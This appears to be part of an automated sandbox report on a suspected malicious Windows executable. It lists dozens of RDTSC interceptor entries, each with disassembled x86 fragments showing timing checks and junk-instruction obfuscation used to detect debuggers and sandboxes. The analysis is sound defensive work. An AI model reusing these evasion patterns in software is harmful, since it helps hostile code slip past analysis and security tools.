Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B2EC9 second address: 13B2EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFD80CDE8CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B2EE6 second address: 13B2EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B2EEA second address: 13B2EF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD80CDE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B1D5E second address: 13B1D79 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD80CCF030h 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B1D79 second address: 13B1D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFD80CDE8C6h 0x0000000a jnp 00007EFD80CDE8C6h 0x00000010 ja 00007EFD80CDE8C6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B1D96 second address: 13B1D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B1D9A second address: 13B1DAF instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD80CDE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007EFD80CDE8C8h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B1DAF second address: 13B1DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137A300 second address: 137A347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D2CECh], eax 0x00000012 lea eax, dword ptr [ebp+1248BFC9h] 0x00000018 mov di, si 0x0000001b nop 0x0000001c jmp 00007EFD80CDE8CCh 0x00000021 push eax 0x00000022 pushad 0x00000023 push edi 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007EFD80CDE8CAh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137A347 second address: 135CC76 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d sub dword ptr [ebp+122D1B33h], eax 0x00000013 mov bh, dh 0x00000015 popad 0x00000016 call dword ptr [ebp+124573BAh] 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007EFD80CCF034h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137A7B8 second address: 11C1D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and edi, 63EAC92Dh 0x00000010 push dword ptr [ebp+122D02F5h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007EFD80CDE8C8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dl, BAh 0x00000032 call dword ptr [ebp+122D21C2h] 0x00000038 pushad 0x00000039 pushad 0x0000003a call 00007EFD80CDE8D9h 0x0000003f push ecx 0x00000040 pop eax 0x00000041 pop ebx 0x00000042 jmp 00007EFD80CDE8D0h 0x00000047 popad 0x00000048 xor eax, eax 0x0000004a mov dword ptr [ebp+122D2D08h], edx 0x00000050 mov edx, dword ptr [esp+28h] 0x00000054 jmp 00007EFD80CDE8D6h 0x00000059 mov dword ptr [ebp+122D2B3Eh], eax 0x0000005f jmp 00007EFD80CDE8D3h 0x00000064 mov esi, 0000003Ch 0x00000069 add dword ptr [ebp+122D2D08h], eax 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 sub dword ptr [ebp+122D2CECh], ebx 0x00000079 lodsw 0x0000007b or dword ptr [ebp+122D3035h], edx 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 sub dword ptr [ebp+122D24D1h], ecx 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f stc 0x00000090 nop 0x00000091 push ebx 0x00000092 push eax 0x00000093 push edx 0x00000094 jp 00007EFD80CDE8C6h 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137A976 second address: 137A984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137A984 second address: 137A98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AB0F second address: 137AB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AB13 second address: 137AB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137ABB2 second address: 137ABB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137ABB7 second address: 137ABBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AE4E second address: 137AE54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B627 second address: 137B6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, dword ptr [ebp+12458FDCh] 0x00000012 mov ecx, dword ptr [ebp+122D2A96h] 0x00000018 lea eax, dword ptr [ebp+1248BFC9h] 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007EFD80CDE8C8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov edi, dword ptr [ebp+122D17CEh] 0x0000003e nop 0x0000003f jmp 00007EFD80CDE8CEh 0x00000044 push eax 0x00000045 jng 00007EFD80CDE8EAh 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007EFD80CDE8D8h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B6B0 second address: 137B6B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B6B4 second address: 135D7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007EFD80CDE8C8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 call dword ptr [ebp+122DB9CDh] 0x00000027 jmp 00007EFD80CDE8CBh 0x0000002c pushad 0x0000002d pushad 0x0000002e push edi 0x0000002f pop edi 0x00000030 jmp 00007EFD80CDE8D3h 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D7CF second address: 135D7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D7D3 second address: 135D7D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D7D7 second address: 135D7F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF032h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D7F3 second address: 135D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2031 second address: 13B2035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2035 second address: 13B204C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B24A2 second address: 13B24A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2A22 second address: 13B2A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jnc 00007EFD80CDE8CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007EFD80CDE8CBh 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B81DD second address: 13B81FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF037h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B81FA second address: 13B8201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8629 second address: 13B8637 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8637 second address: 13B863B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B863B second address: 13B8641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87B5 second address: 13B87B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87B9 second address: 13B87C3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87C3 second address: 13B87C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87C9 second address: 13B87D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF02Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87D9 second address: 13B87DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87DD second address: 13B880D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007EFD80CCF030h 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 jmp 00007EFD80CCF02Dh 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B880D second address: 13B8812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8812 second address: 13B881B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8DAC second address: 13B8DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007EFD80CDE8C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8F32 second address: 13B8F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF031h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8F49 second address: 13B8F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8F4D second address: 13B8F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B90F2 second address: 13B9102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9102 second address: 13B9121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007EFD80CCF02Dh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jg 00007EFD80CCF026h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9571 second address: 13B9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB1F9 second address: 13BB206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007EFD80CCF026h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332E4F second address: 1332E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFD80CDE8C6h 0x0000000a jp 00007EFD80CDE8C6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332E60 second address: 1332E84 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD80CCF03Fh 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF29C second address: 13BF2B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007EFD80CDE8C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337FD2 second address: 1337FE6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD80CCF02Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337FE6 second address: 1337FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337FEA second address: 1337FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337FEE second address: 133800A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007EFD80CDE8CDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133800A second address: 133800E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339A70 second address: 1339A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D6h 0x00000009 jmp 00007EFD80CDE8D0h 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1A86 second address: 13C1A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1A8C second address: 13C1A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1A90 second address: 13C1A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1CE3 second address: 13C1D18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D2h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007EFD80CDE8D9h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1D18 second address: 13C1D1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4573 second address: 13C4577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C40B9 second address: 13C40C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007EFD80CCF026h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C40C5 second address: 13C40C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C424D second address: 13C4251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4251 second address: 13C4257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C92B2 second address: 13C92F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF033h 0x00000009 jmp 00007EFD80CCF030h 0x0000000e popad 0x0000000f jmp 00007EFD80CCF02Dh 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C87CC second address: 13C87E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D1h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C898E second address: 13C899B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFD80CCF026h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C899B second address: 13C89A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8B2A second address: 13C8B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFD80CCF026h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8B34 second address: 13C8B4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8C5A second address: 13C8C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8C5E second address: 13C8C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8E03 second address: 13C8E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE64D second address: 13CE651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDDE0 second address: 13CDDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDDE5 second address: 13CDDFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD80CDE8D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDDFA second address: 13CDE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFD80CCF02Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE30E second address: 13CE32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE32A second address: 13CE342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFD80CCF033h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D42AF second address: 13D42B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2B29 second address: 13D2B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2B2D second address: 13D2B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007EFD80CDE8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2DEA second address: 13D2E06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF034h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D31C4 second address: 13D31CE instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD80CDE8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D31CE second address: 13D31E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFD80CCF033h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D31E9 second address: 13D31EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B034 second address: 137B03A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
